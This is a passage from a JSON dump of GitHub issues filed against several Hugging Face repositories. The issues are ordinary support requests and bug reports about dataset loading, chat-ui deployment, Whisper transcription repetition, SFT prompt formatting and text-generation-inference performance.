error:\r\n```bash\r\n^C\r\nProcess ForkPoolWorker-1:\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/process.py\", line 314, in _bootstrap\r\n self.run()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/process.py\", line 108, in run\r\n self._target(*self._args, **self._kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/pool.py\", line 114, in worker\r\n task = get()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/queues.py\", line 368, in get\r\n res = self._reader.recv_bytes()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 224, in recv_bytes\r\n buf = self._recv_bytes(maxlength)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 422, in _recv_bytes\r\n buf = self._recv(4)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 387, in _recv\r\n chunk = read(handle, remaining)\r\nKeyboardInterrupt\r\nGenerating train split: 92431 examples [01:23, 1104.25 examples/s] \r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1373, in iflatmap_unordered\r\n yield queue.get(timeout=0.05)\r\n File \"\", line 2, in get\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/managers.py\", line 818, in _callmethod\r\n kind, result = conn.recv()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 258, in recv\r\n buf = self._recv_bytes()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 422, in _recv_bytes\r\n buf = self._recv(4)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 387, in _recv\r\n chunk = read(handle, remaining)\r\nKeyboardInterrupt\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nTraceback (most recent call last):\r\n File \"/mnt/data/liyongyuan/source/batch_load.py\", line 11, in \r\n a = load_dataset(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/load.py\", line 2133, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 954, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1049, in _download_and_prepare\r\n self._prepare_split(split_generator, **prepare_split_kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1842, in _prepare_split\r\n for job_id, done, content in iflatmap_unordered(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1387, in iflatmap_unordered\r\n [async_result.get(timeout=0.05) for async_result in async_results]\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1387, in \r\n [async_result.get(timeout=0.05) for async_result in async_results]\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/pool.py\", line 770, in get\r\n raise TimeoutError\r\nmultiprocess.context.TimeoutError\r\n```\r\nI have validated the basic correctness of these `.jsonl` files. They are correctly formatted (or they cannot be loaded singly by `load_dataset`) though some of the json may contain too long text (more than 1e7 characters). I do not know if this could be the problem. And there should not be any bottleneck in system's resource. The whole dataset is ~300GB, and I am using a cloud server with plenty of storage and 1TB ram. \r\nThanks for your efforts and patience! Any suggestion or help would be appreciated.\n\n### Steps to reproduce the bug\n\n1. use load_dataset() with `data_files = LIST_OF_FILES`\n\n### Expected behavior\n\nAll the files should be smoothly loaded. \n\n### Environment info\n\n- Datasets: A private datas", "url": "https://github.com/huggingface/datasets/issues/6108", "state": "open", "labels": [], "created_at": "2023-08-01T02:28:06Z", "updated_at": "2024-12-31T16:01:00Z", "comments": 7, "user": "LoveCatc" }, { "repo": "huggingface/chat-ui", "number": 379, "title": "Issue with Chat UI when deploying Text Generation API on a remote server", "body": "\r\nI am facing an issue with the Chat UI while using the Text Generation API. Everything works correctly when the Text Generation API is deployed on localhost, but the Chat UI doesn't work when the Text Generation API is deployed on a remote server.\r\n\r\nSteps to reproduce the problem:\r\n1. Deploy the Text Generation API on localhost.\r\n2. Use the Chat UI to generate text and verify that it works correctly.\r\n3. Deploy the Text Generation API on a remote server.\r\n4. Use the Chat UI again to generate text and notice that it no longer works.\r\n\r\nExpected behavior:\r\nThe Chat UI should work properly, whether the Text Generation API is deployed on localhost or on a remote server.\r\n\r\nAdditional information:\r\n- I am using version 0.4 of the Chat UI and version 0.9.3 of the Text Generation API.\r\n- The remote server hosting the Text Generation API responds correctly to requests.\r\n- Tests have been conducted with the \"text generation\" client and Postman.\r\n\r\nAny assistance in resolving this issue would be highly appreciated. Thank you!\r\n\r\n![20230731_191316](https://github.com/huggingface/chat-ui/assets/49948822/658df806-11a7-4268-855c-f0fdbbe724b5)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/379", "state": "open", "labels": [ "support" ], "created_at": "2023-07-31T17:22:49Z", "updated_at": "2023-09-18T12:55:45Z", "comments": 0, "user": "bilal-rachik" }, { "repo": "huggingface/chat-ui", "number": 378, "title": "Add support for endpoints requiring client authentication using PKI", "body": "Hi,\r\n\r\nAre you open to adding support for endpoints that require client authentication using PKI? I have a requirement to use client authentication with our backend inference server. \r\n\r\nCurrently authentication config from each endpoint is passed to the headers arg of the fetch command: https://github.com/huggingface/chat-ui/blob/main/src/lib/server/generateFromDefaultEndpoint.ts#L35\r\n\r\nMy quick googling has yielded this: https://sebtrif.xyz/blog/2019-10-03-client-side-ssl-in-node-js-with-fetch/ \r\ntl;dr; they create a `https.Agent(..)` which loads a PKI context from file which is passed to the `agent` arg in the fetch command. \r\n\r\nIf you're happy for this to be added, how would you like to separate the logic of authentication using headers and client authentication using an SSL context?\r\n\r\nThank you! :) ", "url": "https://github.com/huggingface/chat-ui/issues/378", "state": "closed", "labels": [ "question", "front" ], "created_at": "2023-07-31T17:13:53Z", "updated_at": "2023-08-15T18:51:29Z", "user": "cambriancoder" }, { "repo": "huggingface/chat-ui", "number": 377, "title": "Provide a login button, for existing users?", "body": "I just changed to another laptop, and didn't find a login button to see and work with my account from Huggingface. After I used once the Chat, I got a message to Login. I would suggest making it more traditional to have a username and a login button on the left sidebar.", "url": "https://github.com/huggingface/chat-ui/issues/377", "state": "closed", "labels": [ "enhancement", "front" ], "created_at": "2023-07-31T12:08:52Z", "updated_at": "2023-08-02T12:19:30Z", "comments": 1, "user": "tobiashochguertel" }, { "repo": "huggingface/datasets", "number": 6104, "title": "HF Datasets data access is extremely slow even when in memory", "body": "### Describe the bug\r\n\r\nDoing a simple `some_dataset[:10]` can take more than a minute.\r\n\r\nProfiling it:\r\n\"image\"\r\n\r\n`some_dataset` is completely in memory with no disk cache.\r\n\r\nThis is proving fatal to my usage of HF Datasets. Is there a way I can forgo the arrow format and store the dataset as PyTorch tensors so that `_tensorize` is not needed? And is `_consolidate` supposed to take this long?\r\n\r\nIt's faster to produce the dataset from scratch than to access it from HF Datasets!\r\n\r\n### Steps to reproduce the bug\r\n\r\nI have uploaded the dataset that causes this problem [here](https://huggingface.co/datasets/NightMachinery/hf_datasets_bug1).\r\n\r\n```python\r\n#!/usr/bin/env python3\r\nimport sys\r\nimport time\r\nimport torch\r\nfrom datasets import load_dataset\r\n\r\n\r\ndef main(dataset_name):\r\n # Start the timer\r\n start_time = time.time()\r\n\r\n # Load the dataset from Hugging Face Hub\r\n dataset = load_dataset(dataset_name)\r\n\r\n # Set the dataset format as torch\r\n dataset.set_format(type=\"torch\")\r\n\r\n # Perform an identity map\r\n dataset = dataset.map(lambda example: example, batched=True, batch_size=20)\r\n\r\n # End the timer\r\n end_time = time.time()\r\n\r\n # Print the time taken\r\n print(f\"Time taken: {end_time - start_time:.2f} seconds\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dataset_name = \"NightMachinery/hf_datasets_bug1\"\r\n print(f\"dataset_name: {dataset_name}\")\r\n main(dataset_name)\r\n```\r\n\r\n### Expected behavior\r\n\r\n_\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.13.1\r\n- Platform: Linux-5.15.0-76-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3", "url": "https://github.com/huggingface/datasets/issues/6104", "state": "open", "labels": [], "created_at": "2023-07-31T11:12:19Z", "updated_at": "2023-08-01T11:22:43Z", "comments": 1, "user": "NightMachinery" }, { "repo": "huggingface/diffusers", "number": 4382, "title": "HOW TO Overcoming the Influence of Seed and Enhancing the Role of Text Prompts", "body": "I fine-tuned a text2img model using Lora, based on the v1.5 version of stable diffusion. The results generated are very good.\r\nBut they can\u2019t be controlled. It seems that the generated results are more based on the seed. Changing the seed changes the image, And if I don\u2019t change the seed and only change the text prompt, the result doesn\u2019t change, or there are only very slight changes. \r\n1. How should I solve this problem?\r\n2. I would like to request a new feature that helps balance the influence between the seed and the prompt, as some questions are indeed sensitive to the seed.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4382", "state": "closed", "labels": [], "created_at": "2023-07-31T07:41:03Z", "updated_at": "2023-08-02T09:23:50Z", "user": "XiaoyuZhuang" }, { "repo": "huggingface/transformers.js", "number": 230, "title": "[Question] distiluse-base-multilingual-cased-v2 - wrong vector dimension (768 vs 512) in onnx version?", "body": "I was just playing around with the model [distiluse-base-multilingual-cased-v2](https://huggingface.co/sentence-transformers/distiluse-base-multilingual-cased-v2) and noticed that your onnx versions both (quantized and normal) produce embeddings with 768-dimensional vectors instead of 512.\r\n\r\nExample:\r\n\r\nindex.html\r\n\r\n```html\r\n\r\n\r\n \r\n Transformers.js Example\r\n \r\n \r\n

Transformers.js Example

\r\n \r\n \r\n\r\n```\r\n\r\nmain.js\r\n\r\n```javascript\r\nimport { pipeline } from 'https://cdn.jsdelivr.net/npm/@xenova/transformers@2.4.4';\r\n\r\nasync function allocatePipeline() {\r\n let pipe = await pipeline(\"feature-extraction\",\r\n \"Xenova/distiluse-base-multilingual-cased-v2\");\r\n let out = await await pipe(\"test\", { pooling: 'mean', normalize: true });\r\n console.log(out);\r\n}\r\nallocatePipeline();\r\n```\r\n\r\nThat gives me\r\n\r\n```\r\nProxy(s)\u00a0{dims: Array(2), type: 'float32', data: Float32Array(768), size: 768}\r\n```\r\n\r\nHowever, the model page states\r\n\r\n> This is a [sentence-transformers](https://www.sbert.net/) model: It maps sentences & paragraphs to a 512 dimensional dense vector space and can be used for tasks like clustering or semantic search.\r\n\r\nAlso, I used the Python package\r\n\r\n```python\r\nfrom sentence_transformers import SentenceTransformer\r\nmodel = SentenceTransformer('sentence-transformers/distiluse-base-multilingual-cased-v2')\r\nmodel.encode(\"test\") \r\n```\r\n\r\nwhich gives me a correct 512-dimensional embedding.\r\n\r\nAm I missing some option here or overseeing the obvious?", "url": "https://github.com/huggingface/transformers.js/issues/230", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-30T16:49:36Z", "updated_at": "2024-10-18T13:30:12Z", "user": "do-me" }, { "repo": "huggingface/trl", "number": 592, "title": "How to load a custom structure model\uff1f", "body": "hello\uff0c when I run the following code, I am prompted that only support `AutoModelForCausalLMWithValueHead` and `AutoModelForSeq2SeqLMWithValueHead`. But these two structures seem to only be able to load the specified pre-trained model.\r\n`ppo_trainer = PPOTrainer(config, gen_model, gen_ref_model, tokenizer)`\r\n\r\nMy model is trained by the T5, and the structure has changed. I would like to know how to load my model? Is it supported?\r\n", "url": "https://github.com/huggingface/trl/issues/592", "state": "closed", "labels": [], "created_at": "2023-07-30T15:42:18Z", "updated_at": "2023-08-31T11:00:56Z", "user": "estuday" }, { "repo": "huggingface/datasets", "number": 6099, "title": "How do i get \"amazon_us_reviews", "body": "### Feature request\n\nI have been trying to load 'amazon_us_dataset\" but unable to do so. \r\n\r\n`amazon_us_reviews = load_dataset('amazon_us_reviews')`\r\n`print(amazon_us_reviews)`\r\n\r\n\r\n> [ValueError: Config name is missing.\r\n\r\nPlease pick one among the available configs: ['Wireless_v1_00', 'Watches_v1_00', 'Video_Games_v1_00', 'Video_DVD_v1_00', 'Video_v1_00', 'Toys_v1_00', 'Tools_v1_00', 'Sports_v1_00', 'Software_v1_00', 'Shoes_v1_00', 'Pet_Products_v1_00', 'Personal_Care_Appliances_v1_00', 'PC_v1_00', 'Outdoors_v1_00', 'Office_Products_v1_00', 'Musical_Instruments_v1_00', 'Music_v1_00', 'Mobile_Electronics_v1_00', 'Mobile_Apps_v1_00', 'Major_Appliances_v1_00', 'Luggage_v1_00', 'Lawn_and_Garden_v1_00', 'Kitchen_v1_00', 'Jewelry_v1_00', 'Home_Improvement_v1_00', 'Home_Entertainment_v1_00', 'Home_v1_00', 'Health_Personal_Care_v1_00', 'Grocery_v1_00', 'Gift_Card_v1_00', 'Furniture_v1_00', 'Electronics_v1_00', 'Digital_Video_Games_v1_00', 'Digital_Video_Download_v1_00', 'Digital_Software_v1_00', 'Digital_Music_Purchase_v1_00', 'Digital_Ebook_Purchase_v1_00', 'Camera_v1_00', 'Books_v1_00', 'Beauty_v1_00', 'Baby_v1_00', 'Automotive_v1_00', 'Apparel_v1_00', 'Digital_Ebook_Purchase_v1_01', 'Books_v1_01', 'Books_v1_02']\r\nExample of usage:\r\n\t`load_dataset('amazon_us_reviews', 'Wireless_v1_00')`]\r\n\r\n__________________________________________________________________________\r\n`amazon_us_reviews = load_dataset('amazon_us_reviews', 'Watches_v1_00')\r\nprint(amazon_us_reviews)`\r\n\r\n**ERROR**\r\n`Generating` train split: 0%\r\n0/960872 [00:00 1693 example = self.info.features.encode_example(record) if self.info.features is not None else record\r\n 1694 writer.write(example, key)\r\n\r\n11 frames\r\nKeyError: 'marketplace'\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nDatasetGenerationError Traceback (most recent call last)\r\n/usr/local/lib/python3.10/dist-packages/datasets/builder.py in _prepare_split_single(self, gen_kwargs, fpath, file_format, max_shard_size, split_info, check_duplicate_keys, job_id)\r\n 1710 if isinstance(e, SchemaInferenceError) and e.__context__ is not None:\r\n 1711 e = e.__context__\r\n-> 1712 raise DatasetGenerationError(\"An error occurred while generating the dataset\") from e\r\n 1713 \r\n 1714 yield job_id, True, (total_num_examples, total_num_bytes, writer._features, num_shards, shard_lengths)\r\n\r\nDatasetGenerationError: An error occurred while generating the dataset\n\n### Motivation\n\nThe dataset I'm using\r\nhttps://huggingface.co/datasets/amazon_us_reviews\n\n### Your contribution\n\nWhat is the best way to load this data", "url": "https://github.com/huggingface/datasets/issues/6099", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-07-30T11:02:17Z", "updated_at": "2023-08-21T05:08:08Z", "comments": 10, "user": "IqraBaluch" }, { "repo": "huggingface/trl", "number": 591, "title": "how to use SFTTrainer for multi turns dialogue?", "body": "I wanto use SFTTrainer to train a multi turns dialogues. does it apply to llama-2-7b-cha-hf? is it same to llama-2-7b-hf for instruction tune?\r\nmy dataset is multi turns dialogues. \r\nthe prompt is:\r\n```\r\n[INST] <>\r\n{{ system_prompt }}\r\n<>\r\n\r\n{{ user_msg_1 }} [/INST] {{ model_answer_1 }} [INST] {{ user_msg_2 }} [/INST] {{ model_answer_2 }} [INST] {{ user_msg_3 }} [/INST]\r\n\r\n```", "url": "https://github.com/huggingface/trl/issues/591", "state": "closed", "labels": [], "created_at": "2023-07-30T05:47:40Z", "updated_at": "2023-08-01T06:21:04Z", "user": "moseshu" }, { "repo": "huggingface/transformers.js", "number": 228, "title": "[Question] Chaining automatic-speech recognition tasks sometimes produces weird output?", "body": "Hi! I'm using the automatic-speech recognition task with vanilla nodejs (20) for (almost) live transcription (after the person has stopped talking)\r\n\r\nThis is the setup I'm using as per the docs:\r\n\r\n```\r\nconst multilingual = true;\r\nconst model = \"base\";\r\nconst modelName = `Xenova/whisper-${model}${multilingual ? \"\" : \".en\"}`;\r\n\r\nconst transcriber = await pipeline(\"automatic-speech-recognition\", modelName);\r\n\r\nconst wav = new wavefile.WaveFile();\r\nwav.fromScratch(1, 48000, \"32f\", audioBuffer.getChannelData(0));\r\n\r\nwav.toSampleRate(16000); // Whisper expects audio with a sampling rate of 16000\r\n\r\nlet audioData = wav.getSamples();\r\nif (Array.isArray(audioData)) {\r\n audioData = audioData[0];\r\n}\r\n\r\nlet output = await transcriber(audioData);\r\n```\r\n\r\nThis code almost works perfectly (also verified the wav files by saving them locally)\r\n\r\nBut every once in a while the model seems to get stuck for a couple of seconds. I can't say if this is because I'm sending multiple requests to the pipe while there's still a task in progress (multiple speakers), or something else entirely. Sadly I don't think there's any documentation if the pipeline has a queue of some sort or if it just mangles the data weirdly.\r\n\r\nThe output will look like this even though the sound-snippet only contains a single \"Ah...\":\r\n\r\n```\r\ntook 7.202248899996281s: Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah... Ah...\r\n```\r\n\r\nor like this (no music was being played)\r\n\r\n```\r\ntook 6.9480034999996425s: [Music]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]\r\n```\r\n\r\nGeneration time is also much, much longer (normally under 1s with whisper-base, this is the main problem I'm facing)\r\n\r\nIs this is a bug? I was thinking of working around the problem by canceling the operation if it takes longer than 2-3s if that's possible, but that'd just be the laziest workaround.\r\n(something like `pipe.cancel();` or equivalent)\r\n\r\nOr alternatively implementing a queue myself if it actually jumbles data when chaining tasks\r\n\r\nThanks so much in advance for any suggestions! ", "url": "https://github.com/huggingface/transformers.js/issues/228", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-30T01:32:26Z", "updated_at": "2024-12-07T14:45:02Z", "user": "funiel" }, { "repo": "huggingface/diffusers", "number": 4363, "title": "how to properly load sd_xl_base_1.0_0.9vae.safetensors", "body": "### Describe the bug\n\nhi, how should i load sd_xl_base_1.0_0.9vae.safetensors given the namespace is the same as 1.0 one?\n\n### Reproduction\n\nN/A\n\n### Logs\n\n_No response_\n\n### System Info\n\nec2\n\n### Who can help?\n\n@sayakpaul @patrick", "url": "https://github.com/huggingface/diffusers/issues/4363", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-29T21:16:34Z", "updated_at": "2023-10-18T15:14:58Z", "user": "MaxTran96" }, { "repo": "huggingface/optimum-neuron", "number": 151, "title": "any example of how to use with Accelerate?", "body": "All the examples seem to replace `Trainer` but we are using `Accelerate`. Much appreciated! :)", "url": "https://github.com/huggingface/optimum-neuron/issues/151", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-29T05:51:20Z", "updated_at": "2024-12-02T08:05:47Z", "user": "jiangts" }, { "repo": "huggingface/transformers.js", "number": 226, "title": "voice recognition", "body": "@xenova hello bro i wish every things is good on you so i just wanna ask if we can recognize an audio file using his buffer ecxept wav extensions only i mean using mp3 file buffer or flac extension?\r\n```\r\n// Load audio data\r\nlet url = 'https://huggingface.co/datasets/Xenova/transformers.js-docs/resolve/main/jfk.wav';\r\nlet buffer = Buffer.from(await fetch(url).then(x => x.arrayBuffer()))\r\n\r\n// Read .wav file and convert it to required format\r\nlet wav = new wavefile.WaveFile(buffer);\r\nwav.toBitDepth('32f'); // Pipeline expects input as a Float32Array\r\nwav.toSampleRate(16000); // Whisper expects audio with a sampling rate of 16000\r\nlet audioData = wav.getSamples();\r\nif (Array.isArray(audioData)) {\r\n // For this demo, if there are multiple channels for the audio file, we just select the first one.\r\n // In practice, you'd probably want to convert all channels to a single channel (e.g., stereo -> mono).\r\n audioData = audioData[0];\r\n}\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/226", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-28T16:14:50Z", "updated_at": "2023-08-20T23:43:31Z", "user": "jedLahrim" }, { "repo": "huggingface/chat-ui", "number": 372, "title": "Can I add i18n support?", "body": "Would be great to support the standard i18n in frontend, we can contribute with it, do you see that it would be an accepted contribution?\r\n\r\nMaybe using this lib [kaisermann/svelte-i18n](https://github.com/kaisermann/svelte-i18n/blob/main/docs/Getting%20Started.md)", "url": "https://github.com/huggingface/chat-ui/issues/372", "state": "closed", "labels": [ "enhancement", "question", "front" ], "created_at": "2023-07-28T11:56:55Z", "updated_at": "2024-06-17T18:07:41Z", "user": "juancgalvis" }, { "repo": "huggingface/chat-ui", "number": 371, "title": "Improve the UI, to be flexible width?", "body": "The left sidebar is growing here, and I wished I could make it wider. Same for the middle part, which is centered, and sometimes I have to scroll to the side to see the whole code block because the middle part has a left and right margin, what I can't control.\r\n\r\nIt would be great when we could set the percent value for the left sidebar and the middle part in users' profile?", "url": "https://github.com/huggingface/chat-ui/issues/371", "state": "open", "labels": [], "created_at": "2023-07-28T11:27:27Z", "updated_at": "2023-07-28T15:16:38Z", "comments": 2, "user": "tobiashochguertel" }, { "repo": "huggingface/accelerate", "number": 1786, "title": "Problem about how to save memory on 2 GPU at one machine.", "body": "Why I run my script on one GPU at batch_size 8,nothing happened, I use the accelerate launch my script on 2 GPU at same batch_size, both process terminate because CUDA out of Memory.\r\n\r\nHere is my config :\r\ncompute_environment: LOCAL_MACHINE\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ndynamo_config:\r\n dynamo_backend: INDUCTOR\r\ngpu_ids: all\r\nmachine_rank: 0\r\nmain_training_function: main\r\nmixed_precision: 'no'\r\nnum_machines: 1\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n\r\nWhen normal run my script on one GPU, the memory util is about 23GB/24GB.\r\nIs this config make my process use more memory?", "url": "https://github.com/huggingface/accelerate/issues/1786", "state": "closed", "labels": [], "created_at": "2023-07-28T09:42:43Z", "updated_at": "2023-09-15T15:06:17Z", "user": "Kangkang625" }, { "repo": "huggingface/text-generation-inference", "number": 720, "title": "How to make sure the local tgi server's performance is ok", "body": "### Feature request\n\nHello, I just deployed the tgi server as docs in docker container on an single A100 and have a load test with bloom-7b1, but the performance has come a long way from other inference servers, like vllm, fastertransformer in the same environment & condition. So, if there is something like an official performance table for a beginner like me to make sure the performance is ok, or there are detailed instructions for me to check and set up some options to improve throughput. Thanks a lot!\n\n### Motivation\n\nNone\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/text-generation-inference/issues/720", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-07-28T07:57:18Z", "updated_at": "2024-04-25T01:58:42Z", "user": "lichangW" }, { "repo": "huggingface/transformers.js", "number": 224, "title": "[Question] Merge whisper-base.en main and output_attentions?", "body": "I can see there is `output_attentions` branch on https://huggingface.co/Xenova/whisper-base.en/tree/main and the difference from `main` seems it can support `return_timestamps: 'word'`.\r\n\r\nIs there a plan/schedule to merge these two?\r\n\r\nOr these two branches are incompatible to be merged together? In such case, will both receive future updates?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/224", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-28T07:44:52Z", "updated_at": "2023-09-04T20:59:21Z", "user": "jozefchutka" }, { "repo": "huggingface/blog", "number": 1352, "title": "How to train the autoformer?", "body": "Dear authors,\r\n\r\nI have read your blog at https://huggingface.co/blog/autoformer, it is great to explain why transformer is better than Dlinear.\r\nHowever, I am wondering how to train my own Autoformer instead of using a pretrained Autoformer.\r\n\r\nBest regards", "url": "https://github.com/huggingface/blog/issues/1352", "state": "open", "labels": [], "created_at": "2023-07-28T03:28:33Z", "updated_at": "2023-12-07T17:40:09Z", "user": "AppleMax1992" }, { "repo": "huggingface/text-generation-inference", "number": 718, "title": "How to make sure Flash and PagedAttention are running?", "body": "### System Info\n\nI am running the following for llamav2, and was wondering how I can make sure pagedattention and flashattention are running? any Flag to be set or they are enabled by default? \r\n\r\n\r\n```\r\ndocker run --gpus all --shm-size 1g -p $PORT:80 \\\r\n -v $PWD/data:/data \\\r\n -e HUGGING_FACE_HUB_TOKEN=$token \\\r\n ghcr.io/huggingface/text-generation-inference:0.9.3 \\\r\n --model-id $MODEL \\\r\n --sharded false \\\r\n --max-input-length 1024 \\\r\n --max-total-tokens 2048 \\\r\n --max-best-of 5 \\\r\n --max-concurrent-requests 5000 \\\r\n --max-batch-total-tokens $TOKENS\\\r\n --num-shard 4\r\n \r\n ```\r\n \n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nIt more of question not a bug.\n\n### Expected behavior\n\njust doc clarification.", "url": "https://github.com/huggingface/text-generation-inference/issues/718", "state": "closed", "labels": [], "created_at": "2023-07-27T22:55:26Z", "updated_at": "2023-07-28T08:19:20Z", "user": "HamidShojanazeri" }, { "repo": "huggingface/text-generation-inference", "number": 716, "title": "How to load private model in tgi in docker and difference inference performance when loading from huggingface/loading from locally directory", "body": "Hi team, \r\n How do we load a private model in tgi in the docker because of the access issue? \r\n One solution I think is to pre-download the model and then mount the model directory and load into tgi. However, I find out there is a big performance inference gap between these two methods and could the team provide some hints on why is it? \r\n \r\n Reproduce step: \r\n Model example: bigcode/santacoder\r\n 1. inference on 100 tokens via model-id bigcode/santacoder is 180ms\r\n Command: `docker run --gpus all --shm-size 1g -p 8080:80 -v /data:/data ghcr.io/huggingface/text-generation-inference:0.9.4 --model-id bigcode/santacoder --num-shard 1 --max-input-length 1000 --max-total-tokens 2000 --max-batch-total-tokens 4096 --max-concurrent-requests 1 --max-stop-sequences 20 --dtype float16 --trust-remote-code`\r\n\r\ntotal_time=\"158.787824ms\" validation_time=\"221.404\u00b5s\" queue_time=\"48.671\u00b5s\" inference_time=\"158.517849ms\" time_per_token=\"7.925892ms\"\r\n\r\n 2.1 first git clone the bigcode/santacoder directory by running `git lfs install && git clone https://huggingface.co/bigcode/santacoder `\r\n 2.2 running docker image loading via model-id santacoder directory. inference on 100 tokens is 280ms. \r\ncommand \r\n`docker run --gpus all -v santacoder_path:/model --shm-size 1g -p 8080:80 -v /data:/data ghcr.io/huggingface/text-generation-inference:0.9.4 --model-id /model --num-shard 1 --max-input-length 1000 --max-total-tokens 2000 --max-batch-total-tokens 4096 --max-concurrent-requests 1 --max-stop-sequences 20 --dtype float16 --trust-remote-code`\r\n\r\ntotal_time=\"329.15002ms\" validation_time=\"183.883\u00b5s\" queue_time=\"52.371\u00b5s\" inference_time=\"328.914016ms\" time_per_token=\"16.4457ms\" seed=\"None\"}:\r\n\r\nFor loading with local directory, it takes more time to shard and it has one warning about Model does not support automatic max batch total tokens. Also the output is garbage.\r\n\r\nTest Command for query server `curl 127.0.0.1:8080/generate -X POST -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' -H 'Content-Type: application/json\r\n`\r\n I think there may be some additional steps to make model better performance but I have not realized it yet. Thanks for the help in advance!\r\nDocker image version: ghcr.io/huggingface/text-generation-inference:0.9.4\r\n \r\n ", "url": "https://github.com/huggingface/text-generation-inference/issues/716", "state": "closed", "labels": [], "created_at": "2023-07-27T21:12:38Z", "updated_at": "2023-07-28T07:12:53Z", "user": "zch-cc" }, { "repo": "huggingface/text-generation-inference", "number": 711, "title": "How could I know what is wrong when connect refuse happen?", "body": "Hi\r\n\r\nI try with below command to launch the docker.\r\n\r\n```\r\ndocker run --rm --name tgi --runtime=nvidia -e 